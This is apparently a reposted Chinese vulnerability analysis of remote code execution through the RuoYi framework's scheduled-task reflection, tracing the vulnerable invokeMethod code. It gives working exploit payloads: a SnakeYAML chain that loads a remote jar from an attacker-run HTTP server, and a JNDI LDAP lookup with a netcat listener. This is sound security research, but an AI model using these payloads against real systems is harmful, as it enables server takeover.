若依定时任务的实现是通过反射调来调用目标类,目标类的类名可控导致rce。在版本迭代中增加了黑白名单来防御,但仍然可绕过! 前言关于若依漏洞或者是审计的文章网上挺多的,本来就只是想写一下最新版4.7.8的RCE。因为之前没接触过若依就打算看看定时任务实现的原理以及历史的漏洞,但是在查阅资料的时候,发现了一些文章给的poc有问题,比如作者写的是<4.7.2时,给的是org.springframework.jndi.JndiLocatorDelegate.lookup('r'm'i://ip:端口/refObj') ,大概作者的目的是想说明可以通过若依对字符串的处理的一些问题(参数中的' 会替换为空)绕过对rmi 的过滤,但是却没有考虑到org.springframework.jndi 在4.7.1版本中已经加入了黑名单。作者也只是给出了poc,并没有复现的过程! 计划任务实现原理从官方文档可以看出可以通过两种方法调用目标类: 接下来咱调试一下,看看具体是如何实现的这个功能的 首先直接在测试类下个断点,看看调用 通过系统默认的任务1来执行这个测试类 在调用过程中,会发现在com.ruoyi.quartz.util.JobInvokeUtil 类中存在两个名为invokeMethod 的方法,并前后各调用了一次
在第一个invokeMethod 方法中对调用目标字符串的类型进行判断,判断是Bean还是Class。然后调用第二个invokeMethod 方法 if (!isValidClassName(beanName)){ Object bean = SpringUtils.getBean(beanName); invokeMethod(bean, methodName, methodParams); } else { Object bean = Class.forName(beanName).newInstance(); invokeMethod(bean, methodName, methodParams); }
第二个invokeMethod 这个方法通过反射来加载测试类 if (StringUtils.isNotNull(methodParams) && methodParams.size() > 0){ Method method = bean.getClass().getDeclaredMethod(methodName, getMethodParamsType(methodParams)); method.invoke(bean, getMethodParamsValue(methodParams)); }
这大概就是定时任务加载类的逻辑 漏洞成因接着我们新增一个定时任务,看看在创建的过程中对调用目标字符串做了哪些处理 抓包可以看到直接调用了/monitor/job/add 这个接口 可以看到就只是判断了一下,目标字符串是否包含rmi:// ,这就导致导致攻击者可以调用任意类、方法及参数触发反射执行命令。 由于反射时所需要的:类、方法、参数都是我们可控的,所以我们只需传入一个能够执行命令的类方法就能达到getshell的目的,该类只需要满足如下几点要求即可: 具有public类型的无参构造方法 自身具有public类型且可以执行命令的方法
4.6.2因为目前对调用目标字符串限制不多,so直接拿网上公开的poc打吧! SnakeYAML反序列化探测SnakeYAMLpoc: String poc = '{!!java.net.URL [\'http://5dsff0./\']: 1}';
利用SPI机制-基于ScriptEngineManager利用链来执行命令,直接使用这个师傅写好的脚本:https://github.com/artsploit/yaml-payload 1)把这块修改成要执行的命令 2)把项目生成jar包 javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件 jar -cvf yaml-payload.jar -C src/ . //打包成jar包
3)在yaml-payload.jar根目录下起一个web服务 python -m http.server 9999
4)在计划任务添加payload,执行 org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://127.0.0.1:9999/yaml-payload.jar']]]]')
JNDI注入使用yakit起一个返连服务 poc: javax.naming.InitialContext.lookup('ldap://127.0.0.1:8085/calc')
nc监听端口 文章来源: https://forum.butian.net/share/2796 文章作者:Yu9 如有侵权请联系我们,我们会进行删除并致歉
|